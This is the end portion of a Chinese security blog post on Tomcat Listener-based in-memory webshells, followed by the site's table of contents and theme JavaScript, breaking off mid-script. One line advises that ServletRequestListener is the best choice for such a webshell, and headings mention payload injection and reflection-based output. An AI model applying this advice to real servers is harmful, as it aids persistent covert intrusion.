<li><strong>最优选择</strong>：做内存马首选 <code>ServletRequestListener</code>，触发频率最高，其他类型的 Listener 触发条件苛刻，实战价值有限</li>
</ul>
</article>
<div class="article-footer">
    <section id="license">
      <div class="header"><span>许可协议</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    

</div>






<footer class="page-footer footnote"><hr><div class="welcome-text" style="text-align: center; padding: 10px 0; font-size: 14px; color: #fff;">欢迎入侵本站</div><div class="text"></div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">

<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">本文目录</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-Listener-%E2%80%94%E2%80%94-Tomcat-%E5%86%85%E5%AD%98%E9%A9%AC-%E5%9B%9E%E6%98%BE%E9%97%AE%E9%A2%98-%E5%8F%8D%E5%B0%84%E6%80%BB%E7%BB%93"><span class="toc-text">代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95"><span class="toc-text">目录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%EF%BC%9AStandardContext-%E5%9B%9E%E9%A1%BE"><span class="toc-text">前置：StandardContext 回顾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ApplicationEventDispatcher"><span class="toc-text">ApplicationEventDispatcher</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ServletRequestListener-%E7%A4%BA%E4%BE%8B%EF%BC%88%E9%9D%99%E6%80%81%E6%B3%A8%E5%86%8C%EF%BC%89"><span class="toc-text">ServletRequestListener 示例（静态注册）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web-xml-%E4%B8%AD%E6%B3%A8%E5%86%8C-Listener-%E7%9A%84%E6%A0%87%E5%87%86%E5%86%99%E6%B3%95"><span class="toc-text">web.xml 中注册 Listener 的标准写法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E6%B3%A8%E5%85%A5-Payload%EF%BC%88%E6%97%A0%E5%9B%9E%E6%98%BE%E7%89%88%EF%BC%89"><span class="toc-text">动态注入 Payload（无回显版）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Listener-%E4%B8%8E-Filter-Servlet-%E7%9A%84%E5%B7%AE%E5%BC%82%E5%AF%B9%E6%AF%94"><span class="toc-text">Listener 与 Filter&#x2F;Servlet 的差异对比</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9E%E6%98%BE%E9%97%AE%E9%A2%98%EF%BC%9A%E4%B8%BA%E4%BB%80%E4%B9%88-Listener-%E4%B8%8D%E8%83%BD%E7%9B%B4%E6%8E%A5%E5%9B%9E%E6%98%BE%EF%BC%9F"><span class="toc-text">回显问题：为什么 Listener 不能直接回显？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E5%86%B3%E5%9B%9E%E6%98%BE%EF%BC%9A%E5%8F%8D%E5%B0%84%E7%A1%AC%E6%8B%BF-Response"><span class="toc-text">解决回显：反射硬拿 Response</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E5%B8%B8%E8%A7%81-Listener-%E6%8E%A5%E5%8F%A3%E7%AE%80%E4%BB%8B"><span class="toc-text">其他常见 Listener 接口简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E8%A1%A5%E5%85%85%EF%BC%9A%E5%85%AD%E5%A4%A7%E6%A0%B8%E5%BF%83%E8%83%BD%E5%8A%9B"><span class="toc-text">反射补充：六大核心能力</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li></ol></div><div class="widget-footer"><a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Solar by 480 Design - https://creativecommons.org/licenses/by/4.0/ --><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="1.5"><path stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/><path d="M7 3.338A9.95 9.95 0 0 1 12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10S2 17.523 2 12c0-1.821.487-3.53 1.338-5"/></g></svg><span>回到顶部</span></a></div></widget>
</div></aside><div class='float-panel'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">


<script type="text/javascript">
  window.canonical = {"originalHost":null,"officialHosts":["localhost"],"encoded":""};
  const ctx = {
    date_suffix: {
      just: `刚刚`,
      min: `分钟前`,
      hour: `小时前`,
      day: `天前`,
    },
    root : `/`,
    tag_plugins: {
      chat: Object.assign({"api":"https://siteinfo.listentothewind.cn/api/v1"}),
    }
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
    loading: `https://api.iconify.design/eos-icons:three-dots-loading.svg?color=%231cd0fd`,
  };
  const deps = {
    jquery: `https://gcore.jsdelivr.net/npm/jquery@3.7/dist/jquery.min.js`,
    marked: `https://gcore.jsdelivr.net/npm/marked@13.0/lib/marked.umd.min.js`,
    lazyload: `/%5Bobject%20Object%5D`
  }
  

</script>

<script type="text/javascript">
  
  function RunItem() {
    this.list = []; // 存放回调函数
    this.start = () => {
      for (var i = 0; i < this.list.length; i++) {
        this.list[i].run();
      }
    };
    this.push = (fn, name, setRequestAnimationFrame = true) => {
      let myfn = fn
      if (setRequestAnimationFrame) {
        myfn = () => {
          utils.requestAnimationFrame(fn)
        }
      }
      var f = new Item(myfn, name);
      this.list.push(f);
    };
    this.remove = (name) => {
      for (let index = 0; index < this.list.length; index++) {
        const e = this.list[index];
        if (e.name == name) {
          this.list.splice(index, 1);
        }
      }
    }
    // 构造一个可以run的对象
    function Item(fn, name) {
      // 函数名称
      this.name = name || fn.name;
      // run方法
      this.run = () => {
        try {
          fn()
        } catch (error) {
          console.log(error);
        }
      };
    }
  }

  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')) {
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function () {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },

    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      const maxRetry = 3;
      let retryCount = 0;

      return new Promise((resolve, reject) => {
        const load = () => {
          utils.onLoading?.(el);

          let timedOut = false;
          const timeout = setTimeout(() => {
            timedOut = true;
            console.warn('[request] 超时:', url);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject('请求超时');
            } else {
              setTimeout(load, 1000);
            }
          }, 5000);

          fetch(url).then(resp => {
            if (timedOut) return;
            clearTimeout(timeout);

            if (!resp.ok) throw new Error('响应失败');
            return resp;
          }).then(data => {
            if (timedOut) return;
            utils.onLoadSuccess?.(el);
            callback(data);
            resolve(data);
          }).catch(err => {
            clearTimeout(timeout);
            console.warn('[request] 错误:', err);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject(err);
            } else {
              setTimeout(load, 1000);
            }
          });
        };

        load();
      });
    },
    requestWithoutLoading: (url, options = {}, maxRetry = 2, timeout = 5000) => {
      return new Promise((resolve, reject) => {
        let retryCount = 0;

        const tryRequest = () => {
          let timedOut = false;
          const timer = setTimeout(() => {
            timedOut = true;
            if (++retryCount > maxRetry) reject('timeout');
            else tryRequest();
          }, timeout);

          fetch(url, options)
            .then(resp => {
              clearTimeout(timer);
              if (!resp.ok) throw new Error('bad response');
              resolve(resp);
            })
            .catch(err => {
              clearTimeout(timer);
              if (++retryCount > maxRetry) reject(err);
              else setTimeout(tryRequest, 500);
            });
        };

        tryRequest();
      });
    },
    /********************** requestAnimationFrame ********************************/
    // 1、requestAnimationFrame 会把每一帧中的所有 DOM 操作集中起来，在一次重绘或回流中就完成，并且重绘或回流的时间间隔紧紧跟随浏览器的刷新频率，一般来说，这个频率为每秒60帧。
    // 2、在隐藏或不可见的元素中，requestAnimationFrame 将不会进行重绘或回流，这当然就意味着更少的的 cpu，gpu 和内存使用量。
    requestAnimationFrame: (fn) => {
      if (!window.requestAnimationFrame) {
        window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame;
      }
      window.requestAnimationFrame(fn)
    },
    dark: {},
  };

  // utils.dark.mode 当前模式 dark or light
  // utils.dark.toggle() 暗黑模式触发器
  // utils.dark.push(callBack[,"callBackName"]) 传入触发器回调函数
  utils.dark.method = {
    toggle: new RunItem(),
  };
  utils.dark = Object.assign(utils.dark, {
    push: utils.dark.method.toggle.push,
  });
</script>
<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>

<script async src="https://gcore.jsdelivr.net/npm/vanilla-lazyload@19.1/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
    callback_loaded: (el) => {
      el.classList.add('loaded');
      const wrapper = el.closest('.lazy-box');
      const icon = wrapper?.querySelector('.lazy-icon');
      if (icon) icon.remove();
    }
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });

  window.wrapLazyloadImages = (container) => {
    if (typeof container === 'string') {
      container = document.querySelector(container);
    }
    if (!container) return;
    
    const images = container.querySelectorAll('img');
    images.forEach((img) => {
      if (img.classList.contains('lazy')) return;

      const src = img.getAttribute('src');
      if (!src) return;

      const wrapper = document.createElement('div');
      wrapper.className = 'lazy-box';

      const newImg = img.cloneNode();
      newImg.removeAttribute('src');
      newImg.setAttribute('data-src', src);
      newImg.classList.add('lazy');

      const icon = document.createElement('div');
      icon.className = 'lazy-icon';
      if (def.loading) {
        icon.style.backgroundImage = `url("${def.loading}")`;
      }

      wrapper.appendChild(newImg);
      wrapper.appendChild(icon);

      img.replaceWith(wrapper);
    });

    // 通知 LazyLoad 更新
    if (window.lazyLoadInstance?.update) {
      window.lazyLoadInstance.update();
    }
  }
  
</script>

<!-- required -->
<script src="/js/main.js?v=1.33.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    document.documentElement.setAttribute('data-theme', theme)
  }

  const switchTheme = () => {
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    if (currentTheme === 'light') {
      newTheme = 'dark'
    } else {
      newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)
    
    const messages = {
      light: `切换到浅色模式`,
      dark: `切换到深色模式`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    } else {
      applyTheme('dark')
    }
  })()
</script>

<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"rating":{"js":"/js/services/rating.js","api":"https://star-vote.xaox.cc/api/rating"},"vote":{"js":"/js/services/vote.js","api":"https://star-vote.xaox.cc/api/vote"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"friends_and_posts":{"js":"/js/services/friends_and_posts.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"voice":{"js":"/js/plugins/voice.js"},"video":{"js":"/js/plugins/video.js"},"download-file":{"js":"/js/plugins/download-file.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"},"contributors":{"edit_this_page":{"_posts/":null,"wiki/stellar/":"https://github.com/xaoxuu/hexo-theme-stellar-docs/blob/main/"},"js":"/js/services/contributors.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else if (id == 'voice') {
        ctx.voiceAudios = document.querySelectorAll('.voice>audio');
        if (ctx.voiceAudios?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            createVoiceDom(ctx.voiceAudios);
          });
        }
      } else if (id == 'video') {
        ctx.videos = document.querySelectorAll('.video>video');
        if (ctx.videos?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            videoEvents(ctx.videos);
          });
        }
      } else if (id == 'download-file') {
        ctx.files = document.querySelectorAll('.file');
        if (ctx.files?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            downloadFileEvent(ctx.files);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }

    // chat iphone time
    let phoneTimes = document.querySelectorAll('.chat .status-bar .time');

    if (phoneTimes.length > 0) {
      NowTime();
      var date = new Date();
      var sec = date.getSeconds();
      var firstAdjustInterval = setInterval(firstAdjustTime, 1000 * (60 - sec));
    }

    function firstAdjustTime() {
      NowTime();
      clearInterval(firstAdjustInterval);
      setInterval(NowTime, 1000 * 60);
    }

    function NowTime() {
      for (let i = 0; i < phoneTimes.length; ++i) {
        var timeSpan = phoneTimes[i];
        var date = new Date();
        var hour = date.getHours();
        var min = date.getMinutes();
        timeSpan.innerHTML = check(hour) + ":" + check(min);
      }
    };

    function check(val) {
      if (val < 10) {
        return ("0" + val);
      }
      return (val);
    }

    // chat quote
    const chat_quote_obverser = new IntersectionObserver((entries, observer) => {
      entries.filter((entry) => { return entry.isIntersecting }).sort((a, b) => a.intersectionRect.y !== b.intersectionRect.y ? a.intersectionRect.y - b.intersectionRect.y : a.intersectionRect.x - b.intersectionRect.x).forEach((entry, index) => {
          observer.unobserve(entry.target);
          setTimeout(() => {
            entry.target.classList.add('quote-blink');
            setTimeout(() => {
              entry.target.classList.remove('quote-blink');
            }, 1000);
          }, Math.max(100, 16) * (index + 1));
        });
    });

    var chatQuotes = document.querySelectorAll(".chat .talk .quote");
    chatQuotes.forEach((quote) => {
      quote.addEventListener('click', function () {
        var chatCellDom = document.getElementById("quote-" + quote.getAttribute("quotedCellTag"));
        if (chatCellDom) {
          var chatDiv = chatCellDom.parentElement;
          var mid = chatDiv.clientHeight / 2;
          var offsetTop = chatCellDom.offsetTop;
          if (offsetTop > mid - chatCellDom.clientHeight / 2) {
            chatDiv.scrollTo({
              top: chatCellDom.offsetTop - mid + chatCellDom.clientHeight / 2,
              behavior: "smooth"
            });
          } else {
            chatDiv.scrollTo({
              top: 0,
              behavior: "smooth"
            });
          }
          chat_quote_obverser.observe(chatCellDom);
        }
      });
    });
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://gcore.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->


<!-- Custom Image Viewer -->
<script src="/js/plugins/image-viewer.js"></script>

<!-- Custom Context Menu -->
<script src="/js/plugins/custom-context-menu.js"></script>

<!-- Glitch Effect -->
<script src="/js/plugins/glitch-effect.js"></script>

<!-- Terminal Copy -->
<script src="/js/plugins/terminal-copy.js"></script>

<!-- Hotkeys -->
<script src="/js/plugins/hotkeys.js"></script>

<!-- Achievements / Card System -->
<script src="/js/plugins/achievements.js"></script>

<!-- Special Days - 节日彩蛋系统 -->
<script src="/js/plugins/special-days.js"></script>

<!-- Music Player -->
<script src="/js/plugins/music-player.js"></script>

<!-- Offline Vault - 断网保护机制 -->
<script src="/js/plugins/offline-vault.js"></script>

<!-- Live2D Widget - Local Version -->
<script src="/live2d-widget/dist/autoload.js"></script>

<!-- Live2D Widget 位置调整和默认显示 -->
<style>
  #waifu {
    position: fixed !important;
    bottom: 20px !important;
    right: 20px !important;
    left: auto !important;
    z-index: 1000 !important;
    transform: none !important;
    display: block !important;
    opacity: 1 !important;
    visibility: visible !important;
  }
  #waifu #live2d {
    position: relative !important;
    transform: none !important;
  }
  #waifu-toolbar {
    position: relative !important;
    transform: none !important;
  }
  #waifu-toggle {
    display: none !important;
  }
</style>

<!-- 点击特效 -->
<script>
(function() {
  var clickEffects = {
    current: null,
    
    init: function() {
      this.current = localStorage.getItem('clickEffect') || 'none';
      this.bindEvents();
    },
    
    bindEvents: function() {
      var self = this;
      document.addEventListener('click', function(e) {
        if (self.current === 'none') return;
        if (e.target.closest('button, a, input, textarea, select, .post-card, .layout-btn')) return;
        self.createEffect(e.clientX, e.clientY);
      });
      
      window.addEventListener('storage', function(e) {
        if (e.key === 'clickEffect') {
          self.current = e.newValue || 'none';
        }
      });
    },
    
    createEffect: function(x, y) {
      switch(this.current) {
        case 'ripple': this.createRipple(x, y); break;
        case 'firework': this.createFirework(x, y); break;
        case 'particles': this.createParticles(x, y); break;
        case 'text': this.createText(x, y); break;
        default: break;
      }
    },
    
    createRipple: function(x, y) {
      var ripple = document.createElement('div');
      ripple.className = 'click-ripple';
      ripple.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;width:0;height:0;border-radius:50%;background:rgba(52,152,219,0.4);transform:translate(-50%,-50%);pointer-events:none;z-index:9999;animation:rippleExpand 0.6s ease-out forwards;';
      document.body.appendChild(ripple);
      setTimeout(function() { ripple.remove(); }, 600);
    },
    
    createFirework: function(x, y) {
      var colors = ['#ff6b6b', '#feca57', '#48dbfb', '#ff9ff3', '#54a0ff'];
      for (var i = 0; i < 12; i++) {
        var particle = document.createElement('div');
        var angle = (Math.PI * 2 / 12) * i;
        var velocity = 50 + Math.random() * 30;
        particle.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;width:6px;height:6px;border-radius:50%;background:' + colors[i % 5] + ';pointer-events:none;z-index:9999;transform:translate(-50%,-50%);';
        document.body.appendChild(particle);
        this.animateParticle(particle, x, y, x + Math.cos(angle) * velocity, y + Math.sin(angle) * velocity, 500);
      }
    },
    
    createParticles: function(x, y) {
      var colors = ['#ff6b6b', '#feca57', '#48dbfb', '#ff9ff3', '#54a0ff', '#5f27cd'];
      for (var i = 0; i < 8; i++) {
        var particle = document.createElement('div');
        particle.innerHTML = '✨';
        particle.style.cssText = 'position:fixed;left:' + (x + (Math.random()-0.5)*30) + 'px;top:' + (y + (Math.random()-0.5)*30) + 'px;font-size:16px;pointer-events:none;z-index:9999;animation:particleFloat 0.8s ease-out forwards;';
        document.body.appendChild(particle);
        setTimeout(function(p) { return function() { p.remove(); }; }(particle), 800);
      }
    },
    
    createText: function(x, y) {
      var texts = ['666', '厉害', 'nice', '棒', '赞', '给力'];
      var text = document.createElement('div');
      text.innerHTML = texts[Math.floor(Math.random() * texts.length)];
      text.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;font-size:18px;font-weight:bold;color:#3498db;pointer-events:none;z-index:9999;transform:translate(-50%,-50%);animation:textFloat 0.8s ease-out forwards;';
      document.body.appendChild(text);
      setTimeout(function() { text.remove(); }, 800);
    },
    
    animateParticle: function(el, startX, startY, endX, endY, duration) {
      var startTime = performance.now();
      function animate(currentTime) {
        var progress = Math.min((currentTime - startTime) / duration, 1);
        var easeOut = 1 - Math.pow(1 - progress, 3);
        el.style.left = (startX + (endX - startX) * easeOut) + 'px';
        el.style.top = (startY + (endY - startY) * easeOut) + 'px';
        el.style.opacity = 1 - progress;
        if (progress < 1) requestAnimationFrame(animate);
        else el.remove();
      }
      requestAnimationFrame(animate);
    }
  };
  
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', function() { clickEffects.init(); });
  } else {
    clickEffects.init();
  }
  
  window.ClickEffects = clickEffects;
})();
</script>

<style>
@keyframes rippleExpand {
  0% { width: 0; height: 0; opacity: 1; }
  100% { width: 100px; height: 100px; opacity: 0; }
}
@keyframes particleFloat {
  0% { opacity: 1; transform: translateY(0) scale(1); }
  100% { opacity: 0; transform: translateY(-40px) scale(0.5); }
}
@keyframes textFloat {
  0% { opacity: 1; transform: translate(-50%, -50%) scale(1); }
  100% { opacity: 0; transform: translate(-50%, -80px) scale(1.2); }
}
</style>

<!-- PWA Service Worker -->
<script>
if ('serviceWorker' in navigator) {
  navigator.serviceWorker.register('/sw.js').then(function(reg) {
    console.log('Service Worker 已注册，支持离线访问');
  }).catch(function(err) {
    console.log('Service Worker 注册失败:', err);
  });
}
</script>

<!-- Random Cover Image -->
<script>
(function() {
  function refreshRandomCovers() {
    var images = document.querySelectorAll('img[src*="loliapi.com"]');
    images.forEach(function(img) {
      var src = img.src;
      var baseSrc = src.split('?')[0];
      img.src = baseSrc + '?t=' + Date.now() + '&r=' + Math.random().toString(36).substr(2, 9);
    });
  }
  
  if (document.readyState === 'loading') {
